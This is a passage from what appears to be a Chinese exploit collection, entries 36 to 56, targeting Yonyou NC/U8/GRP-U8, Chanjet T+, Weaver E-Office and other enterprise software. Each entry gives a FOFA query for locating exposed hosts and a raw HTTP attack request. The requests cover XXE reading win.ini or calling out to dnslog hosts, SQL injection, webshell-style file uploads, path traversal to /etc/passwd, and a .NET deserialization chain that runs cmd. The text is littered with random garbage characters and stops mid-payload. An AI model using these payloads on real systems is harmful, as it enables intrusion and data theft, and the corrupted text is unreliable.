/ B7 C! E/ U+ N2 @Accept-Encoding: gzip, deflate- H( w4 d8 [. I# `$ ^5 m9 V
Accept: */*+ w: u, Y. y. F
Connection: close
) z1 k8 H c4 u" JaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
& i( _& ^$ R1 m( q, L6 vContent-Length: 190
8 V- U% Z, p+ M) e! YContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
+ P- n) P i/ R1 R) v' Q ~6 s: r7 w1 l0 A7 B5 P' \
--fd28cb44e829ed1c197ec3bc71748df01 l5 e, l) b4 e7 g
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"( ^# C7 p/ \0 X9 Y7 y
5 l; j- C. I9 Q<%out.println(1111*1111);%>! G% j B Q$ `6 X+ D
--fd28cb44e829ed1c197ec3bc71748df0--
2 f+ v) P& N! Y& G+ S3 p- G; M
$ M' c% n6 n( C3 E; G8 y# x; B
# n) M1 {6 n, x) Y* v4 Q; s36. 用友NC-Cloud soapFormat XXE
/ ~+ {4 E5 m( ` u* BFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
% d! Z3 a" { L# k+ [POST /uapws/soapFormat.ajax HTTP/1.19 P4 u- f9 g$ }8 C) E
Host: 192.168.40.130:8989
# B' e! Z" U+ dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
0 d0 ^6 o; j( _5 |: ]/ V7 tContent-Length: 2634 X: i1 W7 e; w2 C) R# t; G3 w' `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 k( g$ B8 m$ I! E# E9 c! L- K0 [Accept-Encoding: gzip, deflate
3 [# U- W! V% `/ F% yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; [: Z) ?5 F8 g0 E! ]' S1 mConnection: close
% s/ w/ t- M* K/ b* N+ OContent-Type: application/x-www-form-urlencoded
6 r" B. @ G7 O9 }/ qUpgrade-Insecure-Requests: 1
+ ? { e7 m1 M* O' F% H/ k7 @2 g, m; H) _
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
. G" K3 T8 `/ `" O b: h) Z* t) r* H2 h* O5 j1 u+ z
' n& \5 k0 n3 k0 D d3 i
37. 用友NC-Cloud IUpdateService XXE+ V$ b ~+ w: r- G
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
: M0 D' V$ F2 T$ P; NPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1" O" {- J7 o- f- b e9 |$ n
Host: 192.168.40.130:8989' _4 f- F# m6 Y2 D0 M+ u. B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.360 }, Q w( x5 d |# x" [5 B+ U- G* ]
Content-Length: 421
3 Q/ B8 ^9 N( ]+ sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9$ n0 \7 }+ [1 g3 I2 ]
Accept-Encoding: gzip, deflate
) v. T c4 L/ `+ M U: GAccept-Language: zh-CN,zh;q=0.91 t- d; M$ Q. S* c& N# u
Connection: close0 k9 t$ L6 P @. O# x0 O
Content-Type: text/xml;charset=UTF-8
- X0 Y4 j$ o6 ?+ ~! NSOAPAction: urn:getResult1 c2 B8 S, d; c0 T0 Y" h, _
Upgrade-Insecure-Requests: 1) {& [9 P" }! c; F
. W0 }6 p$ a; ?7 a5 c
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">: T( I9 g: Z# r/ f8 ?2 L) i! ~: W
<soapenv:Header/>3 I# y. G* K+ _' }
<soapenv:Body>
& d& k* j3 d; V<iup:getResult>
6 b# o7 r' [' }, V, c! }- {<!--type: string-->8 b5 g( N' r5 O; O8 L5 T# A
<iup:string><![CDATA[9 q( n7 B5 T( @/ o& H
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>7 M D+ V& u u
<xxx/>]]></iup:string>0 `: C# W% m K' j
</iup:getResult># }9 p; j1 p }6 r) F% u& F3 n' U
</soapenv:Body>
* A+ c; ~# K* k k ~& A: j</soapenv:Envelope>( Z6 e3 ^5 m. k. A( B7 Q
* A) S" b5 K0 @( ~( q q
4 E+ f0 M1 _9 i6 T# f! L9 ?0 ?* F) f1 e$ p% U% w& r- L$ Y8 X
38. 用友U8 Cloud smartweb2.RPC.d XXE5 y* F9 Y; P- N$ ?) |, v; u
FOFA:app="用友-U8-Cloud"
. Y M' P, u3 b- v* vPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.16 g. a$ ~: Q* H. g4 X6 j& r
Host: 192.168.40.131:8088: W( }2 J& i; |6 K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
; z+ T, {8 {" J$ M; h0 \8 w: ?/ n1 wContent-Length: 2602 H* @- _( k6 _7 r d, q8 G2 z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
/ f C2 ~7 k# T$ @: v5 |Accept-Encoding: gzip, deflate
; B1 Q9 X- u/ x1 E: p7 N1 {3 KAccept-Language: zh-CN,zh;q=0.9* ~" B# W& X# d# {. Q& E
Connection: close0 `7 M7 d% y5 m* B' s
Content-Type: application/x-www-form-urlencoded
2 K, |6 r! R3 k' d6 D1 _& y( ~
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
, P! ^* P! `, D/ b0 l v4 o- M
4 I( r& p: C7 i' ?- ]
" R* H, u3 W6 ~* ]& s39. 用友U8 Cloud RegisterServlet SQL注入
& t9 L7 a( i4 Z4 q" A( f: LFOFA:title="u8c"
+ F' x( w, W+ x* XPOST /servlet/RegisterServlet HTTP/1.1
! D1 u) Y# I8 r aHost: 192.168.86.128:80896 k+ m0 h) g2 R- |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
( G; V* a( G* d3 b) {" dConnection: close
% p; N/ w0 j- b8 E& C6 GContent-Length: 85
# I9 C' g; m( Q5 N; E$ ], |Accept: */*9 S) l2 L2 n& Z4 z
Accept-Language: en
+ k5 r! a% D4 M. d7 ]# v$ lContent-Type: application/x-www-form-urlencoded& E4 f# t6 ]6 W+ [: U/ Y8 Y* V
X-Forwarded-For: 127.0.0.1$ q& A6 {$ \ d
Accept-Encoding: gzip
' A6 E5 `. V+ o; V4 j
3 U! D1 c3 y% V3 q, o! o7 y% S1 susercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
5 Q* }) a) s. C, L! C
" O& J" e, R8 m/ a! j
2 I& Z7 p: {/ F; Y7 B. V40. 用友U8-Cloud XChangeServlet XXE
, ~) Q+ t4 W' e; E. WFOFA:app="用友-U8-Cloud"
4 B0 p; j; [& YPOST /service/XChangeServlet HTTP/1.1& O! J6 ?$ `6 g$ x+ i
Host: x.x.x.x
$ g0 J3 N+ N# L! P6 I" `- yUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36) B" [9 k" Y! t# ^: ]
Content-Type: text/xml
- B" U3 l6 A0 @1 T$ L2 c5 P$ wConnection: close4 ^- o' v3 ], ~ C3 [4 y
D/ h5 }. Z+ M; E<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>/ b5 k2 ^' [+ N7 ~0 e1 C" U
8 G9 j4 v/ u. U
3 Y, d2 a7 f9 b. m7 w V
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入( s9 S1 F- t$ S, E
FOFA:app="用友-U8-Cloud"
% g9 K; s% f9 t0 cGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
( _& m! ?4 _+ ^- iHost:
" p) B" w0 d. _$ n& v$ Y, oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* D+ w+ @6 u4 v3 bContent-Type: application/json Y1 c& ?8 S( L' X b
Accept-Encoding: gzip2 q% C4 L7 [# V$ u" v) B6 R
Connection: close
1 y+ ?0 E( U: r$ e0 N8 V% H3 [
+ X1 ~5 }1 {' D; i) [* o, j; h
42. 用友GRP-U8 SmartUpload01 文件上传
( ~; W7 ?! x/ j* |FOFA:app="用友-GRP-U8"
& S+ O! I3 A1 l) _) F0 tPOST /u8qx/SmartUpload01.jsp HTTP/1.10 p6 z$ Q5 N' ^4 Z+ Y
Host: x.x.x.x8 {" e, e2 N9 Z2 W$ e6 ^, _1 q. T/ ?
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
" c7 i% B& F3 `+ s) g. ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
9 K' x+ N1 Y2 k
q8 X& t+ W$ P3 y2 i- CPAYLOAD- s* M5 M, I3 y
$ q0 E( ^8 E& Y, \$ d
1 s& \9 g2 D+ ~- ihttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
' b1 q$ S% u: { C
4 w" p6 M9 P8 i* ?43. 用友GRP-U8 userInfoWeb SQL注入致RCE
# A0 T6 ?1 r2 X, }, R) u V* m E' o IFOFA:app="用友-GRP-U8"# L0 i F- |/ [$ t: m
POST /services/userInfoWeb HTTP/1.1
- A& c/ Y% I) l1 z" ~2 p$ mHost: your-ip
2 I3 [7 T; W* r% m, b: V, ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36( [/ b% z- w* ~# z3 e1 f+ p, d8 e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! k# q9 H6 k/ n3 [Accept-Encoding: gzip, deflate' P- l: R+ A8 |) y& M6 S
Accept-Language: zh-CN,zh;q=0.90 b/ g3 I; c2 ]; w4 s$ b/ k6 t3 u2 u
Connection: close
( W- r$ V5 F( K4 qSOAPAction:7 }# f3 C @5 L
Content-Type: text/xml;charset=UTF-8# @& }* O& w$ `# A4 T7 \: }1 d: d6 B3 r
& s6 n; |) Z: _5 k3 f# Q<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">6 A7 @8 H, Q8 T$ H1 Y
<soapenv:Header/>
3 I; k9 i( z" z. j6 X <soapenv:Body>' R+ b* O- Z4 W
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">! T6 L n. a/ n
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
" Z$ z7 Q5 ]; u! V8 B </ser:getUserNameById>
( k, { I% @& n( l% T" x( L- F </soapenv:Body>, }# O8 Z( \6 m
</soapenv:Envelope>
& ~% f5 |7 \8 O% k* B1 Y6 f8 E2 f- N# m0 z
# |" D" a3 q' O m, u' O+ X9 H1 |8 Y0 N
44. 用友GRP-U8 bx_dj_check.jsp SQL注入) N6 n4 F0 M- ]2 G3 k4 n
FOFA:app="用友-GRP-U8"$ L: |) v" d( U Y4 \1 K3 x. ~- F5 s
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.17 J3 S# T. I% a" a8 p8 j7 o/ G
Host: your-ip) c0 C& y' N- k4 H7 p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.367 X' C; n1 E u/ w6 @5 {8 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: w7 |, Z6 o* h. a. k2 ~3 {8 jAccept-Encoding: gzip, deflate
" O# C( N5 |9 S7 j+ ~, d" dAccept-Language: zh-CN,zh;q=0.9
$ y' n! ]4 ^% U1 Y. t% gConnection: close2 V# |& n+ \2 B: h2 |# Z" [+ {7 @
4 t& g8 [3 H! A G# i) f
, y( E- Q6 t: O+ `; N
45. 用友GRP-U8 ufgovbank XXE
) `% s- `5 K& F* d# vFOFA:app="用友-GRP-U8"
. q7 j/ _) _: O8 _POST /ufgovbank HTTP/1.1
# h1 g' }% `3 `8 t" N/ CHost: 192.168.40.130:222% @5 C' z" z+ K3 M6 ` y+ S* |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
& m$ R# k4 {7 E% p8 V9 Q6 cConnection: close" }, C8 z$ M G$ C
Content-Length: 161
) V7 x$ p' q- H+ ~4 x; oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* m% g" e* ^) c* w& I' z( e! EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 \" W3 O) ^8 ]* G0 m* f
Content-Type: application/x-www-form-urlencoded
8 s( A( S. U/ j' n( jAccept-Encoding: gzip
, @/ E' E& t3 l6 P1 ?& U! Y' n* b! F: _, P4 r
reqData=<?xml version="1.0"?>
2 y! y& Z) `2 C6 q; D/ c<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest' q$ _; \4 H5 o
7 {+ A% m- h/ F& q# v. c. d' u' T: i8 x# [8 V7 e* N1 H
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
\7 b6 C+ n' N3 CFOFA:app="用友-GRP-U8"
" p. {3 G. E: {) \8 f% oGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.17 j# ^# d, P: \' K2 Z
Host: your-ip; k! x2 h$ O* n; l6 \. n' s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.367 j+ I- [5 q/ L: e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 W" m3 a% v% m- v" C
Accept-Encoding: gzip, deflate1 \. f( X6 R/ t1 W! y( t4 M2 ]3 c
Accept-Language: zh-CN,zh;q=0.9
# T% o) T, _& l8 lConnection: close
% k+ C' i2 r- w$ i, c. k, R, n" U2 |$ n3 X) C
7 u# K3 F, [0 U, R/ {
47. 用友GRP A++Cloud 政府财务云 任意文件读取
8 l# H( E+ [4 U) [# HFOFA:body="/pf/portal/login/css/fonts/style.css". t5 C+ i9 t' e* R* m
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1) V, P' |1 L9 g8 ~! z
Host: x.x.x.x6 K0 \. V, d n+ C& R
Cache-Control: max-age=0
$ l- b- y( V: Z% X9 q r; sUpgrade-Insecure-Requests: 1
! v+ p+ r: y# h% c+ }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
( `/ `; D3 @$ ?4 F9 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 L8 i: J) W7 H$ G* W
Accept-Encoding: gzip, deflate, br
, `; Q& V1 o0 R" A& |Accept-Language: zh-CN,zh;q=0.9' ]* N& b+ H+ M& Q$ c% }
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
. D7 w& X$ v! B! R. ^. ?: R$ O uConnection: close( M8 t0 }0 o/ P' b
. x8 w& I3 M; t/ I& {2 q# t9 e/ l0 _ R2 o" {
8 T# e6 D4 U! w9 f48. 用友U8 CRM swfupload 任意文件上传
8 W1 \& N' {9 q/ p0 ?7 MFOFA:title="用友U8CRM"
4 n4 u# G0 N& bPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.12 s7 {; A- ?7 q1 ^; B
Host: your-ip
4 d% ~7 O5 p3 ]; s& C1 Q; f x: S, rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
& h. ?) |: U0 M$ @* F- q0 i' cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" r6 w( M" `4 t H$ @" s" D/ ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 t+ v& m) E( n' v/ q& {Accept-Encoding: gzip, deflate
7 `' }- ~) H0 k/ j, _ J7 a$ iContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
& J/ l: D. I x% z' D6 o------269520967239406871642430066855
. c4 ~/ t3 ^4 N1 y QContent-Disposition: form-data; name="file"; filename="s.php"
; s. V* W2 q: M1231
) u/ [9 o" l; z/ U* xContent-Type: application/octet-stream" P- q# s% o9 M# k$ @* X! M
------269520967239406871642430066855$ g/ b% K2 ], N$ H# v
Content-Disposition: form-data; name="upload") [/ R- B+ i. z
upload
7 ]3 O3 F( a5 u' X) v6 Z------269520967239406871642430066855--" K3 U& P O, L' T. u, w. v
4 C4 ?* w0 R3 s! v4 z U+ Y, Z: M6 o, ]. [) r
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
% X0 S& r0 h5 BFOFA:body="用友U8CRM"
: E3 J W0 u% K# ?7 L- q( z8 ~) {
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
& R& b7 I3 C( y' }Host: x.x.x.x
; e @5 E& j* s7 t; JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0% D7 Q4 r; F) e$ w
Content-Length: 329" Z6 i: w+ m @9 D1 q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" ^$ H6 h4 f. uAccept-Encoding: gzip, deflate
1 H8 b. ?+ B0 f3 BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 ^: s' I9 J' m4 Z: G( x, Z5 m) U
Connection: close$ E2 U5 E0 z# @* R
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w; C5 V/ z' a9 [; L( L( {( E
. m: W" z/ l2 e; u' z
-----------------------------vvv3wdayqv3yppdxvn3w2 f1 w4 S+ h1 U6 O! }( ?; n* e5 W
Content-Disposition: form-data; name="file"; filename="%s.php "" C0 n) f( y5 p7 E2 U
Content-Type: application/octet-stream) e2 K& R( A. o3 C; {. L- E6 R
* Y" V) R7 ]. y# ?& n) Owersqqmlumloqa
% h$ P" M1 Q+ ~( u* F" @, a! L-----------------------------vvv3wdayqv3yppdxvn3w# q2 |" H8 @4 l5 \, P
Content-Disposition: form-data; name="upload"# M! i9 l- u; E2 M7 h" H
0 `* H/ [7 S/ ?upload1 [- F1 p2 V( X( t% [7 E( F' L
-----------------------------vvv3wdayqv3yppdxvn3w--
, Z1 g, q3 V: |
( p0 v1 x0 y5 D5 V8 Y
1 G3 R# f5 a [2 @& l/ g- F$ }http://x.x.x.x/tmpfile/updB3CB.tmp.php9 G/ [8 m" k8 a+ o9 d
0 F! Y2 Q# [2 G: W50. QDocs Smart School 6.4.1 filterRecords SQL注入: |. T, O5 d9 Y0 Q$ H% R
FOFA:body="close closebtnmodal"
8 Q: U0 @9 e) m, [) M( H3 lPOST /course/filterRecords/ HTTP/1.1
( C' [( g! j" [$ ~$ vHost: x.x.x.x1 R! i5 R8 y% i: C$ @6 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36$ v% y# d+ X' b4 M( P8 b
Connection: close
# j) _+ [* Q$ sContent-Length: 2247 D0 k: l' \! Z/ t& ]; q
Accept: */*
' n8 L, A% @# D) U5 o1 I- W aAccept-Language: en0 i) F, U2 H" i0 N( } P8 O) q( n
Content-Type: application/x-www-form-urlencoded
1 b ]! I, N: a6 d% g, v( r1 d4 {Accept-Encoding: gzip, f5 V7 P+ f% o/ ~/ E' V
8 x! ?0 O$ U7 r& b; A" H" j
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1$ M& @; f! l1 x2 ~. f" x
! a. n3 E/ z+ Z0 m
' F H+ K8 K7 W
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入8 }1 C6 s2 v' @2 f6 m
FOFA:app="云时空社会化商业ERP系统"* ]7 F0 Y7 @) r2 S j
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1/ I" I+ T: j6 G9 y* U( y
Host: your-ip
+ I7 o d& p; c6 c9 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36& q( }: r4 N5 B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9& E" r% B/ X# V2 Z9 g- m
Accept-Encoding: gzip, deflate8 G9 Z* S* Y' [) d
Accept-Language: zh-CN,zh;q=0.9( u9 Z( w1 |4 a, ~
Connection: close
) L! Y5 J5 P' A( N( U% c3 w) W
% d X, e( A9 q0 j" B4 _& ^8 C$ _9 H# W; I. P+ R
52. 泛微E-Office json_common.php sql注入
# k8 E/ N8 ~- C nFOFA:app="泛微-EOffice"
3 p9 b' ?9 K! z/ e/ A0 u HPOST /building/json_common.php HTTP/1.1
7 u3 |2 E! T$ |) `( b/ r5 f3 gHost: 192.168.86.128:8097
0 c( S0 |. S: n! i* o% m4 ZUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36, A) n$ l5 @! k5 Q+ W3 J
Connection: close
, r' f7 B" c8 [+ dContent-Length: 879 ]' Z& v, t8 A2 @& {
Accept: */* z- M n! k. N9 {
Accept-Language: en
1 ]# c9 }, Q# dContent-Type: application/x-www-form-urlencoded
: W1 _' P( \2 D2 L7 M5 HAccept-Encoding: gzip
5 w# U+ ?' |, j p9 F0 I$ F& G; _
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
4 B' g2 w+ R( z7 z E$ B( u: X# A" V
+ Y, D; |3 m* Q( ?# g5 s
53. 迪普 DPTech VPN Service 任意文件上传
9 p9 L# H P7 vFOFA:app="DPtech-SSLVPN"5 a6 W Z' {+ _6 l/ p
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd2 M2 n" k2 j: g) q3 h5 h: ?3 W
7 ^$ R% J; l s d& n+ I: Y
8 Q7 r h9 ]' G# [
54. 畅捷通T+ getstorewarehousebystore 远程代码执行& U/ m$ q& L& S- y2 Y
FOFA:app="畅捷通-TPlus"/ @) N# e9 m; d
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件 Q$ K/ ]" }$ m' r& p
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
* q3 V! e6 [9 F7 u: ^: O% g0 f" s e9 d, z0 i
) u+ S8 R' q: q( A4 k
完整数据包
2 ~2 h9 K7 J$ i8 EPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1+ v" |7 l- N5 S& F$ W
Host: x.x.x.x
2 u2 P' S) @& c. W9 hUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
; y$ n+ u; Y- @4 WContent-Length: 5933 I7 k; R3 U8 x e
! d$ V, ~& R( M' ~1 B8 _; l{
$ T- Z' Y. h! i0 Y0 Z8 @"storeID":{
3 ~7 M# k9 D, b7 x. Z "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",3 m6 \: E1 w; ?0 a8 L6 C5 {
"MethodName":"Start",8 `) n2 n+ d, _0 }3 [$ O
"ObjectInstance":{
/ }8 b F3 `5 \2 _( s$ |4 V "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0 I3 h1 _+ @! _* p" f! N
"StartInfo":{
& t3 W& i' W# `" H$ i* O5 J' |1 n& j6 n "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",+ T4 w! t3 X- I* e
"FileName":"cmd"," j- N% c0 e8 u! E
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
" S% l, {9 c" Q }
2 J) u( u9 ~" Q! j1 f }" t& E4 v/ C9 D/ v- a6 I
}
d' S# y c% z. X6 J0 I9 k5 m! ?+ d}: [9 I8 `0 J# K/ k: e. G2 V& [7 v
8 a3 U5 ? _1 Q8 x5 q" Q4 V2 }. y- s0 z1 K+ q
第二步,访问如下url
8 i$ O$ K+ G1 K9 q* L3 g! Y/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt0 c3 K* w0 u, S5 a" L* g
\7 Y4 ~ P; @6 Y, |7 s/ c% d& l$ x# {1 e, ^% }
55. 畅捷通T+ getdecallusers信息泄露
, j! S6 ~2 u5 z2 \FOFA:app="畅捷通-TPlus"
0 Z6 e3 b& q% Z, g% l第一步,通过
& U1 N: v( X: Y% s) Q/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
( m7 L0 l% X; E第二步,利用获取到的Cookie请求$ m5 u2 l* @ @2 x, k- \
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers$ K* A5 V) R/ E# G5 Q8 Q T# \; u
5 E' r" x J5 c4 U2 Y( l56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE0 \2 @! k4 W* F( o
FOFA: app="畅捷通-TPlus"
; X1 c' Q! D/ ^POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
) l3 X7 T& E" aHost: x.x.x.x l1 P' v* F1 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
& G j/ w" G1 ?7 u$ b: J# gContent-Type: application/json$ i8 h2 A& R4 d8 F9 V; {7 B
6 }" N& V+ D, Z# m
{
* N! `4 Y, L( ]( @ "storeID":{
$ J% m* w" N) ?+ U1 x! I! \3 k "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",+ Z$ I: j5 j& e& B
"MethodName":"Start",8 a5 l0 C4 X O- ?1 m
"ObjectInstance":{4 K1 ` Y; ], f, v7 S( x3 A
